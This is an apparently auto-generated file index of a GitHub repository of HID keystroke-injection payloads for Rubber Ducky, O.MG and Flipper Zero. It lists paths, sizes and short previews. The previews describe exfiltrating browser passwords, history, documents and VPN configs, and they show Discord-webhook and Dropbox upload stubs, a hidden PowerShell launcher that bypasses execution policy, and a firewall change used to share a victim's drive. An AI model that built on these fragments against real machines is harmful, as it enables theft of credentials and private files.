"path": "FlipperZero/payloads/cApS-Troll/a.ps1",
"chars": 501,
"preview": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep"
},
{
"path": "FlipperZero/payloads/cApS-Troll/payload.txt",
"chars": 557,
"preview": "REM Title: cApS-Troll\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to prank your victim w"
},
{
"path": "Functions/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "Functions/tidal-log.ps1",
"chars": 709,
"preview": "# Define the Discord webhook URL\n$webhookUrl = \"https://discord.com/api/webhooks/XXXXXXX\"\n\n# Define the path to the app"
},
{
"path": "OMG/payloads/Bookmark-Hog/BH.ps1",
"chars": 2478,
"preview": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Defau"
},
{
"path": "OMG/payloads/Bookmark-Hog/README.md",
"chars": 3036,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n\n<h1 align=\"center\">\n <a"
},
{
"path": "OMG/payloads/Bookmark-Hog/payload.txt",
"chars": 564,
"preview": "REM Title: Bookmark-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bo"
},
{
"path": "OMG/payloads/Bookmark-Hog/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "OMG/payloads/Browser-Grab/README.md",
"chars": 3076,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Browser-Grab/b.ps1",
"chars": 1095,
"preview": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n "
},
{
"path": "OMG/payloads/Browser-Grab/payload.txt",
"chars": 586,
"preview": "REM Title: Browser-Grab\nREM Author: atomiczsec\nREM Description: A payload to exfiltrate bookmarks, passwords"
},
{
"path": "OMG/payloads/Copy-And-Waste/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "OMG/payloads/Copy-And-Waste/README.md",
"chars": 3544,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hre"
},
{
"path": "OMG/payloads/Copy-And-Waste/c.ps1",
"chars": 965,
"preview": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n [CmdletBinding()"
},
{
"path": "OMG/payloads/Copy-And-Waste/payload.txt",
"chars": 809,
"preview": "REM Title: Copy-And-Waste\r\n\r\nREM Author: atomiczsec & I am Jakoby\r\n\r\nREM Description: This payload is meant "
},
{
"path": "OMG/payloads/Copy-And-Waste/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "OMG/payloads/De-Bloater/README.md",
"chars": 2950,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Doc-Hog/d.ps1",
"chars": 1311,
"preview": "function Doc-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]$"
},
{
"path": "OMG/payloads/Doc-Hog/payload.txt",
"chars": 597,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files. "
},
{
"path": "OMG/payloads/Doc-Hog/readme.md",
"chars": 2211,
"preview": "\r\n<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?li"
},
{
"path": "OMG/payloads/History-Pig/HP.ps1",
"chars": 2509,
"preview": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Defaul"
},
{
"path": "OMG/payloads/History-Pig/README.md",
"chars": 2931,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/History-Pig/payload.txt",
"chars": 563,
"preview": "REM Title: History-Pig\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bro"
},
{
"path": "OMG/payloads/OVPN-Hog/o.ps1",
"chars": 1138,
"preview": "function OVPN-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]"
},
{
"path": "OMG/payloads/OVPN-Hog/payload.txt",
"chars": 623,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files l"
},
{
"path": "OMG/payloads/OVPN-Hog/readme.md",
"chars": 2338,
"preview": "<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?line"
},
{
"path": "OMG/payloads/Powershell-History/PH.ps1",
"chars": 1801,
"preview": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\C"
},
{
"path": "OMG/payloads/Powershell-History/README.md",
"chars": 2967,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Powershell-History/payload.txt",
"chars": 616,
"preview": "REM Title: Powershell-History\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltr"
},
{
"path": "OMG/payloads/Printer-Recon/PR.ps1",
"chars": 1391,
"preview": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alia"
},
{
"path": "OMG/payloads/Printer-Recon/README.md",
"chars": 2812,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Printer-Recon/payload.txt",
"chars": 668,
"preview": "REM Title: Printer-Recon\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate p"
},
{
"path": "OMG/payloads/Priv-Paths/README.md",
"chars": 2761,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Priv-Paths/payload.txt",
"chars": 673,
"preview": "REM Title: Priv-Paths\r\nREM Author: atomiczsec\r\nREM Description: A payload to enumerate unqouted service path"
},
{
"path": "OMG/payloads/Proton-Hog/README.md",
"chars": 2944,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Proton-Hog/payload.txt",
"chars": 613,
"preview": "REM Title: Proton-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: A payload to exfiltrate the user config "
},
{
"path": "OMG/payloads/Proton-Hog/s.ps1",
"chars": 1490,
"preview": "function DropBox-Upload {\r\n\r\n [CmdletBinding()]\r\n param (\r\n \r\n [Parameter (Mandatory = $True, ValueFromP"
},
{
"path": "OMG/payloads/Pwn-Drive/README.md",
"chars": 2869,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hr"
},
{
"path": "OMG/payloads/Pwn-Drive/c.ps1",
"chars": 614,
"preview": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n"
},
{
"path": "OMG/payloads/Pwn-Drive/payload.txt",
"chars": 593,
"preview": "REM Title: Pwn-Drive\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload will share the entire victim"
},
{
"path": "OMG/payloads/RanFunWare/README.md",
"chars": 2914,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n <"
},
{
"path": "OMG/payloads/RanFunWare/payload.txt",
"chars": 579,
"preview": "REM Title: RanFunWare\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload will prank your target into"
},
{
"path": "OMG/payloads/RanFunWare/r.ps1",
"chars": 1875,
"preview": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path "
},
{
"path": "OMG/payloads/Screen-Shock/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "OMG/payloads/Screen-Shock/README.md",
"chars": 3495,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a "
},
{
"path": "OMG/payloads/Screen-Shock/c.ps1",
"chars": 1828,
"preview": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True"
},
{
"path": "OMG/payloads/Screen-Shock/payload.txt",
"chars": 839,
"preview": "REM Title: Screen-Shock\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate sc"
},
{
"path": "OMG/payloads/Screen-Shock/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "OMG/payloads/Spotify-Spy/README.md",
"chars": 3024,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Spotify-Spy/SS.ps1",
"chars": 1441,
"preview": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r"
},
{
"path": "OMG/payloads/Spotify-Spy/payload.txt",
"chars": 660,
"preview": "REM Title: Spotify-Spy\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate spo"
},
{
"path": "OMG/payloads/Water-UnMark/README.md",
"chars": 2798,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"ce"
},
{
"path": "OMG/payloads/Water-UnMark/payload.txt",
"chars": 536,
"preview": "REM Title: Water-UnMark\r\nREM Author: atomiczsec\r\nREM Target OS: Windows 10\r\nREM Description: This script w"
},
{
"path": "OMG/payloads/Water-UnMark/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "OMG/payloads/cApS-Troll/README.md",
"chars": 2997,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/cApS-Troll/a.ps1",
"chars": 501,
"preview": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep"
},
{
"path": "OMG/payloads/cApS-Troll/payload.txt",
"chars": 569,
"preview": "REM Title: cApS-Troll\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to prank your vict"
},
{
"path": "OMG/payloads/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "README.md",
"chars": 1627,
"preview": "# Hak5 & FlipperZero HID Attack Payloads & Functions\n\n\nThis repository contains payloads designed for various hardware h"
},
{
"path": "RubberDucky/payloads/Bookmark-Hog/BH.ps1",
"chars": 2478,
"preview": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Defau"
},
{
"path": "RubberDucky/payloads/Bookmark-Hog/README.md",
"chars": 3036,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n\n<h1 align=\"center\">\n <a"
},
{
"path": "RubberDucky/payloads/Bookmark-Hog/payload.txt",
"chars": 564,
"preview": "REM Title: Bookmark-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bo"
},
{
"path": "RubberDucky/payloads/Browser-Grab/README.md",
"chars": 3196,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Browser-Grab/b.ps1",
"chars": 1095,
"preview": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n "
},
{
"path": "RubberDucky/payloads/Browser-Grab/payload.txt",
"chars": 578,
"preview": "REM Title: Browser-Grab\nREM Author: atomiczsec\nREM Description: A payload to exfiltrate bookmarks, passwords"
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/README.md",
"chars": 3544,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hre"
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/c.ps1",
"chars": 965,
"preview": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n [CmdletBinding()"
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/payload.txt",
"chars": 809,
"preview": "REM Title: Copy-And-Waste\r\n\r\nREM Author: atomiczsec & I am Jakoby\r\n\r\nREM Description: This payload is meant "
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "RubberDucky/payloads/De-Bloater/README.md",
"chars": 2952,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Doc-Hog/d.ps1",
"chars": 1311,
"preview": "function Doc-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]$"
},
{
"path": "RubberDucky/payloads/Doc-Hog/payload.txt",
"chars": 597,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files. "
},
{
"path": "RubberDucky/payloads/Doc-Hog/readme.md",
"chars": 2211,
"preview": "\r\n<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?li"
},
{
"path": "RubberDucky/payloads/History-Pig/HP.ps1",
"chars": 2509,
"preview": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Defaul"
},
{
"path": "RubberDucky/payloads/History-Pig/README.md",
"chars": 2931,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/History-Pig/payload.txt",
"chars": 563,
"preview": "REM Title: History-Pig\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bro"
},
{
"path": "RubberDucky/payloads/OVPN-Hog/o.ps1",
"chars": 1138,
"preview": "function OVPN-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]"
},
{
"path": "RubberDucky/payloads/OVPN-Hog/payload.txt",
"chars": 623,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files l"
},
{
"path": "RubberDucky/payloads/OVPN-Hog/readme.md",
"chars": 2338,
"preview": "<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?line"
},
{
"path": "RubberDucky/payloads/Picture-Hog/p.ps1",
"chars": 1015,
"preview": "function Upload-Discord {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n [parameter(Position=0,Mandatory=$False)]\r\n [string]$fil"
},
{
"path": "RubberDucky/payloads/Picture-Hog/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "RubberDucky/payloads/Powershell-History/PH.ps1",
"chars": 1801,
"preview": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\C"
},
{
"path": "RubberDucky/payloads/Powershell-History/README.md",
"chars": 2967,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Powershell-History/payload.txt",
"chars": 616,
"preview": "REM Title: Powershell-History\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltr"
},
{
"path": "RubberDucky/payloads/Printer-Recon/PR.ps1",
"chars": 1391,
"preview": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alia"
},
{
"path": "RubberDucky/payloads/Printer-Recon/README.md",
"chars": 2812,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Printer-Recon/payload.txt",
"chars": 697,
"preview": "REM Title: Printer-Recon\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate p"
},
{
"path": "RubberDucky/payloads/Priv-Paths/README.md",
"chars": 2758,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Priv-Paths/payload.txt",
"chars": 813,
"preview": "REM Title: Priv-Paths\r\nREM Author: atomiczsec\r\nREM Description: A payload to enumerate unqouted service path"
},
{
"path": "RubberDucky/payloads/Proton-Hog/README.md",
"chars": 2944,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Proton-Hog/payload.txt",
"chars": 640,
"preview": "REM Title: Proton-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: A payload to exfiltrate the user config "
},
{
"path": "RubberDucky/payloads/Proton-Hog/s.ps1",
"chars": 1490,
"preview": "function DropBox-Upload {\r\n\r\n [CmdletBinding()]\r\n param (\r\n \r\n [Parameter (Mandatory = $True, ValueFromP"
},
{
"path": "RubberDucky/payloads/Pwn-Drive/README.md",
"chars": 2870,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hr"
}
]
// ... and 24 more files (download for full content)
About this extraction
This page contains the full source code of the atomiczsec/My-Payloads GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 224 files (316.5 KB), approximately 103.1k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.